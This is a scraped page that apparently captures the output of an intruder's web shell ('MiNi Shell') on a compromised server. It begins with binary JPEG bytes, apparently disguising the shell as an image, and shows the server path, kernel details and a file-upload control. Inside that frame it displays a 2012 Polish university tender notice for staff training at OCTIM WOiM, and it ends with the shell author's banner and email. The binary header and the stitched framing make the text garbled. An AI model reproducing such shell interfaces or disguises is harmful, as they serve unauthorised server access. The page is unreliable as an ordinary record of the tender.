JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/228457-N-2012.html

<p class="kh_header"><b>Olsztyn: Przygotowanie oraz przeprowadzenie szkoleń dla pracowników firmy OCTIM WOiM Sp. z o.o. w ramach Projektu realizowanego przez Uniwersytet Warmińsko - Mazurski w Olsztynie pt. Kwalifikacje na miarę potrzeb - szkolenia dla pracowników OCTIM WOiM Sp. z o.o. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 228457 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie oraz przeprowadzenie szkoleń dla pracowników firmy OCTIM WOiM Sp. z o.o. w ramach Projektu realizowanego przez Uniwersytet Warmińsko - Mazurski w Olsztynie pt. Kwalifikacje na miarę potrzeb - szkolenia dla pracowników OCTIM WOiM Sp. z o.o. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa przygotowania oraz przeprowadzenia szkoleń dla pracowników firmy OCTIM WOiM Sp. z o.o. w ramach Projektu realizowanego przez Uniwersytet Warmińsko - Mazurski w Olsztynie pt. Kwalifikacje na miarę potrzeb - szkolenia dla pracowników OCTIM WOiM Sp. z o.o. współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich
spełnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich
spełnienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich
spełnienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część nr 1. Wykonawca wykaże, że dysponuje lub będzie
dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia tj. 1.
dysponuje minimum jedną osobą posiadającą minimum 5-letnie doświadczenie
zawodowe w prowadzeniu zajęć dydaktycznych lub szkoleniowych z zakresu zarządzania
procesem rozwoju i wprowadzania nowego produktu na rynek (obejmujące wszystkie
elementy programu szkolenia), w tym w ciągu ostatnich 3 lat przed upływem terminu
składania ofert przeprowadziła minimum 50 godzin w każdym z tych lat oraz, 2.
dysponuje minimum jedną osobą mającą przeprowadzone minimum 100 godzin
specjalistycznych szkoleń dla klienta biznesowego z zakresu zarządzania procesem
rozwoju i wprowadzania nowego produktu na rynek (obejmujące wszystkie elementy
programu szkolenia), w okresie ostatnich 3 lat oraz, 3. dysponuje minimum jedną osobą
posiadającą minimum 2-letnie doświadczenie z zakresu zarządzania procesem rozwoju i
wprowadzania nowego produktu na rynek (obejmujące wszystkie elementy programu
szkolenia), nabyte w ramach prowadzenia własnej działalności gospodarczej lub w
ramach zatrudnienia w przedsiębiorstwie. Część nr 2.Wykonawca wykaże, że dysponuje
lub będzie dysponować osobami, które będą uczestniczyć w wykonywaniu zamówienia tj.
1. dysponuje minimum jedną osobą posiadającą minimum 5-letnie doświadczenie
zawodowe w prowadzeniu zajęć dydaktycznych lub szkoleniowych z zakresu technologii
produkcji i badania produktów (obejmujące wszystkie elementy programu szkolenia), w
tym w ciągu ostatnich 3 lat przed upływem terminu składania ofert przeprowadziła
minimum 50 godzin w każdym z tych lat oraz, 2. dysponuje minimum jedną osobą mającą
przeprowadzone minimum 100 godzin specjalistycznych szkoleń dla klienta biznesowego
z zakresu technologii produkcji i badania produktów (obejmujące wszystkie elementy
programu szkolenia), w okresie ostatnich 3 lat oraz, 3. dysponuje minimum jedną osobą
posiadającą minimum 2-letnie doświadczenie z zakresu technologii produkcji i badania
produktów (obejmujące wszystkie elementy programu szkolenia), nabyte w ramach
prowadzenia własnej działalności gospodarczej lub w ramach zatrudnienia w
przedsiębiorstwie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich
spełnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą
podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego, formularz ofertowy
sporządzony przez Wykonawcę według wzoru zamieszczonego na stronie Działu Zamówień
Publicznych UWM w Olsztynie, opis przedmiotu zamówienia sporządzony przez Wykonawcę
według wzoru zamieszczonego na stronie Działu Zamówień Publicznych UWM w Olsztynie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności. 2. Zamawiający
przewiduje w ramach zawartej umowy zmiany dotyczące: a) zmiany terminu realizacji umowy, ze
względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np.
działanie siły wyższej, b) zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności,
których strony umowy nie były w stanie przewidzieć przed jej zawarciem, pomimo zachowania
należytej staranności. 3. W przypadku zaistnienia sytuacji wskazanej w ust. 2, strony ustalają nowy
termin realizacji przedmiotu umowy. 4. Wszelkie zmiany zapisów umowy winny być dokonywane w
formie pisemnej (aneksu do umowy)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet
Warmińsko - Mazurski w Olsztynie, Dział Zamówień Publicznych, ul. Oczapowskiego 2, 10-719
Olsztyn, pok. 311..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 10:00, miejsce: Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział
Zamówień Publicznych, ul. Oczapowskiego 2, 10-719 Olsztyn, pok. 311.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany przez Uniwersytet Warmińsko - Mazurski w
Olsztynie pt. Kwalifikacje na miarę potrzeb - szkolenia dla pracowników OCTIM WOiM Sp. z o.o.
współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie pt. Zarządzanie procesem rozwoju i wprowadzania nowego
produktu na rynek spożywczy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem
zamówienia w zakresie części nr 1 jest przygotowanie i przeprowadzenie w wymiarze 48
godzin szkolenia pt. Zarządzanie procesem rozwoju i wprowadzania nowego produktu na
rynek spożywczy dla pracowników firmy Octim WOiM Sp. z o.o. w ramach projektu
Kwalifikacje na miarę potrzeb - szkolenia dla pracowników OCTIM WOiM Sp. z o.o.
współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
(działanie: 8.1 Rozwój pracowników i przedsiębiorstw w regionie; podziałanie: 8.1.1
Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw Program
Operacyjny Kapitał Ludzki). Umowa o dofinansowanie projektu nr UDA-POKL.08.01.01-28-
009/12-00 z dn. 06/08/2012 r. zawarta z Wojewódzkim Urzędem Pracy w Olsztynie. Szkolenie
kierowane jest do grupy 16 pracowników przedsiębiorstwa Octim WOiM Sp. z o.o. Ramowy
program szkolenia: Moduł I - Od koncepcji po produkcję - rozwój nowego produktu
spożywczego - 2 dni (16h szkoleniowych) Sugerowany termin: pomiędzy 21-24/05/2013 r.
Benchamarking, analiza konkurencji i potrzeb klientów Modele i struktura rozwoju i wdrożenia
produktu Przygotowanie procesu wprowadzenia nowego produktu na rynek - budżet,
harmonogram, analiza pomysłów, opracowanie i testowanie produktu, analiza ekonomiczno -
biznesowa, strategia marketingowa, itd. Moduł II - Od realizacji po ewaluację - wprowadzenie
nowego produktu na rynek: komercjalizacja produktu spożywczego - 2 dni (16h
szkoleniowych) Sugerowany termin: 28-29/05/2013 r. Rozwijanie strategii konkurencji Zmiany i
ewaluacje cyklu życia produktu - strategie i narzędzia marketingowe w cyklu życia produktu
Zagrożenia wprowadzania produktów na rynek. Eliminacja ryzyka Zarządzanie marką i port
folio produktów. Sprzedaż i obsługa klienta Moduł III - Wzornictwo w zarządzaniu rozwojem
produktu spożywczego - funkcja, wizerunek, opakowanie, materiały reklamowe - 2 dni (16h
szkoleniowych) Sugerowany termin: pomiędzy 11-14/06/2013 r. Wzornictwo a wizerunek
produktu/marki Rozwój i optymalizacja produktu i jego opakowania. Efektywne wykorzystanie
kształtu i kolorystyki Wygląd produktu - komunikat dla konsumenta. Branding. Spójność
wizerunku produktu oraz jego komunikacji rynkowej Wzornictwo produktowe w elementach
około produktowych. Projektowanie materiałów reklamowych spójnych z wzornictwem
produktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie pt. Technologia produkcji i badanie produktów spożywczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem
zamówienia w zakresie części nr 2 jest przygotowanie i przeprowadzenie 2 edycji szkolenia pt.
Technologia produkcji i badanie produktów spożywczych (w wymiarze: 2 edycje x 80 godzin
szkoleniowych) dla pracowników firmy Octim WOiM Sp. z o.o. w ramach projektu Kwalifikacje
na miarę potrzeb - szkolenia dla pracowników OCTIM WOiM Sp. z o.o. współfinansowanego
przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (działanie: 8.1
Rozwój pracowników i przedsiębiorstw w regionie; podziałanie: 8.1.1 Wspieranie rozwoju
kwalifikacji zawodowych i doradztwo dla przedsiębiorstw Program Operacyjny Kapitał Ludzki).
Umowa o dofinansowanie projektu nr UDA-POKL.08.01.01-28-009/12-00 z dn. 06/08/2012 r.
zawarta z Wojewódzkim Urzędem Pracy w Olsztynie. Liczba uczestników szkolenia: Moduł I i
II - 24 osoby (2 edycje x 12 osób); Moduł III - 16 osób, w tym 8 osób z modułów I-II (2 edycje x
8 osób). Ramowy program szkolenia: Moduł I - Bezpieczeństwo i jakość mikrobiologiczna,
znakowanie i autentyczność produktów spożywczych (2edycje * 6 dni): Edycja I Badania
mikrobiologiczne żywności i opakowań - zarządzanie jakości, bezpieczeństwo zdrowotne,
higiena produkcji (wg HACCP, GHP,GMP,ISO, itd.) 2 dni (16h szkoleniowych). Sugerowany
termin: pomiędzy 05-08/02/2013 r. Analiza organoleptyczna i sensoryczna żywności.
Doskonalenie wrażliwości sensorycznej 2 dni (16h szkoleniowych). Sugerowany termin:
pomiędzy 19-22/02/2013 r. Znakowanie, autentyczność, zafałszowanie produktów
spożywczych - aspekt prawny, metody wykrywania zafałszowań żywności, rola opakowań 2
dni (16h szkoleniowych). Sugerowany termin: pomiędzy 05-08/03/2013 r. Edycja II Badania
mikrobiologiczne żywności i opakowań - zarządzanie jakości, bezpieczeństwo zdrowotne,
higiena produkcji (wg HACCP, GHP,GMP,ISO, itd.) 2 dni (16h szkoleniowych). Sugerowany
termin: pomiędzy 12-15/02/2013 r. Analiza organoleptyczna i sensoryczna żywności.
Doskonalenie wrażliwości sensorycznej 2 dni (16h szkoleniowych). Sugerowany termin:
pomiędzy 26/02-02/03/2013 r. Znakowanie, autentyczność, zafałszowanie produktów
spożywczych - aspekt prawny, metody wykrywania zafałszowań żywności, rola opakowań 2
dni (16h szkoleniowych). Sugerowany termin: pomiędzy 12-15/03/2013 r. Moduł II -
Pasteryzacja i rozlew aseptyczny musztardy - aspekt technologiczny (2 edycje * 2 dni): Edycja
I Optymalne parametry procesu termicznego Kontrola procesu pasteryzacji Aseptyczne
napełnianie - rozlew, zamykanie opakowań, chłodzenie Ryzyko i eliminacja ryzyka
zanieczyszczeń mikrobiologicznych podczas rozlewu, pakowania, przechowywania Kontrola
mikrobiologiczna procesu pasteryzacji 2 dni (16h szkoleniowych). Sugerowany termin:
pomiędzy 09-12/04/2013 r. Edycja II Optymalne parametry procesu termicznego Kontrola
procesu pasteryzacji Aseptyczne napełnianie - rozlew, zamykanie opakowań, chłodzenie
Ryzyko i eliminacja ryzyka zanieczyszczeń mikrobiologicznych podczas rozlewu, pakowania,
przechowywania Kontrola mikrobiologiczna procesu pasteryzacji 2 dni (16h szkoleniowych).
Sugerowany termin: pomiędzy 16-19/04/2013 r. Moduł III - Mechanizacja i automatyzacja
pasteryzacji musztardy (2 edycje *2 dni): Edycja I - 2 dni (16h szkoleniowych) Sugerowany
termin: 07-10/05/2013 Edycja II - 2 dni (16h szkoleniowych) Sugerowany termin: 14-
17/05/2013..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com